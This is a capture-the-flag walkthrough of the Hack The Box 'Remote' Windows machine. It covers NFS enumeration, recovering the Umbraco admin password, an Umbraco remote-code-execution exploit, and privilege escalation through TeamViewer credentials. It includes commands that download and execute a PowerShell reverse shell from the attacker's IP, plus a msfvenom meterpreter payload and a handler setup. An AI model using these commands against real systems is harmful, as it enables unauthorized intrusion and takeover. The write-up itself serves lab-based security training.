#summary

  • OS: Windows
  • Difficulty: Easy
  • Points: 20
  • Release: 21 Mar 2020
  • IP: 10.10.10.180

Bloods claimed on Remote

User Blood: enjloezz 00 days, 02 hours, 57 mins, 49 seconds.

Root Blood: qtc 00 days, 03 hours, 04 mins, 46 seconds.



#reconnaissance

| nmap

So, I start as default, with nmap.

k[email protected]:~/Desktop/HTB/remote$ nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180

A few seconds later I get a report:

Many intresting things, I assume. But at first, I’ll research port 80.

Making host entries: sudo vi /etc/hosts. Btw, I offer alias to you for make this more fast:



#enumeration

| web

When I researching remote.htb/contact, I find few interesting things.

First, we define the Umbraco CMS by footer. Second, probably we have login page to the admin area by click on the button.

I haven’t been able to find anything else interesting yet. Let’s put this aside for now, and pay attention to rpcbind service from the previous nmap report.



| nfs

I assume what need try nmap script to get more things from that rpcbind.

[email protected]:~/Desktop/HTB/remote$ nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb

And I get second nmap report:


So I saw site_backups directory, lets try mount it:

[email protected]:~/Desktop/HTB/remote$ sudo mount -t nfs remote.htb:/site_backups /mnt

And I got it.


After spending a little time on Google for studying Umbraco CMS, I pulls bits of text (aka strings) from Umbraco.sdf:

[email protected]:/mnt/App_Data$ strings Umbraco.sdf | grep admin

In the output found hash:

And decrypt him.

Now I know password – baconandcheese.



#exploitation

| umbraco-rce

Btw. While I studyed Umbraco CMS, I found cve for him. I think, it time for using it. I will download exploit and simple PS reverse shell in addition.

Starting msfconsole in terminal, and configure:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.19.30
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j

Where 10.10.19.30 is my IP.


Also need start HTTP-server, it very simple in second terminal:

[email protected]:~/Desktop/HTB/remote$ sudo python3 -m http.server 80


Then need configure mini-reverse.ps1 with change ip and port.

$socket = new-object System.Net.Sockets.TcpClient('10.10.19.30', 4444);

and now I starting in 3st terminal exploit with payload:

[email protected]:~/Desktop/HTB/remote$ sudo python3 exploit.py -u [email protected] -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.19.30/mini-reverse.ps1')"

After this work I getting user.txt in msfconsole.



#privilege escalation

To simplify your tasks in the future, I will leave this hint here – click on image to preview


Let’s download winPEAS – for enumeration,

[email protected]:~/Desktop/HTB/remote$ wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe

and generate meterpreter‘s shell for comfortable work:

[email protected]:~/Desktop/HTB/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.30 LPORT=4444 -f exe > meterpreter.exe

Download this on server in my msfconsole session:

powershell Invoke-WebRequest -URI http://10.10.19.30/winPEAS.exe -outfile C:\Users\Public\winPEAS.exe
powershell Invoke-WebRequest -URI http://10.10.19.30/meterpreter.exe -outfile C:\Users\Public\meterpreter.exe


Now I need reconfigure msfconsole for meterpreter,

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.19.30
msf5 exploit(multi/handler) > exploit
meterpreter > shell

and start winPEAS.

C:\windows\system32\inetsrv> C:/Users/Public/winPEAS.exe


| teamviewer

In output of winPEAS I see this tasty gift:

So, it is time to extract passwords:


Last step – connect to server with evil-winrm, and receive root.txt.



#thanks

Last modified: 17.09.2020

Author

Comments

Write a Reply or Comment

Your email address will not be published.